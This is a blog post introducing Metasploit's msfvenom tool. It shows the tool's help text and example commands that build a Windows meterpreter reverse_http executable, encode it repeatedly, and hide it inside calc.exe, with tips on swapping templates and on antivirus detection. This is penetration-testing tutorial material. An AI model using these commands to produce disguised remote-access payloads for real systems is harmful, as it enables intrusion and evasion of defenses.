So unfortunately I have not had the time lately to keep up to date with the changes going on with metasploit but one thing that caught my eye was the msfvenom binary in the root of the framework3 directory. Neat name, but what is it? A little googling found me this blog post by bannedit. He goes on to mention that msfvenon simply combines the functionality of both msfpayload and msfencode.
[code lang=”bash”]Usage: ./msfvenom [options]
-p, –payload [payload] Payload to use. Specify a ‘-‘ or stdin to use custom payloads
-l, –list [module_type] List a module type example: payloads, encoders, nops, all
-n, –nopsled [length] Prepend a nopsled of [length] size on to the payload
-f, –format [format] Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
-e, –encoder [encoder] The encoder to use
-a, –arch [architecture] The architecture to use
–platform [platform] The platform of the payload
-s, –space [length] The maximum size of the resulting payload
-b, –bad-chars [list] The list of characters to avoid example: ‘\x00\xff’
-i, –iterations [count] The number of times to encode the payload
-c, –add-code [path] Specify an additional win32 shellcode file to include
-x, –template [path] Specify a custom executable file to use as a template
-k, –keep Preserve the template behavior and inject the payload as a new thread
-h, –help Show this message[/code]
The new and quick way to create a meterpreter payload would be this:

./msfvenom -p windows/meterpreter/reverse_http -f exe LHOST= LPORT=80 > payload.exe

Moving on to include encoding with 5 iterations(shikata_ga_nai as default):

./msfvenom -p windows/meterpreter/reverse_http -e -i 5 -f exe LHOST= LPORT=80 > payload.exe

And finally hiding inside a trusted executable:

./msfvenom -p windows/meterpreter/reverse_http -e -i 5 -x calc.exe -f exe LHOST= LPORT=80 > payload.exe

For those that didn’t know, creation of a windows exe payload always uses data/templates/template_x86_windows.exe in order to create the payload, this can be changed on the fly like we did above by using the -x calc.exe flag. If you want to permanently change the exe then just simply swap out template_x86_windows.exe for what ever you wish. If you don’t want to use this template method just use the old way to get a very small executable simply use the -f exe-small flag, but beware; most AV products will catch this!

Leave a Reply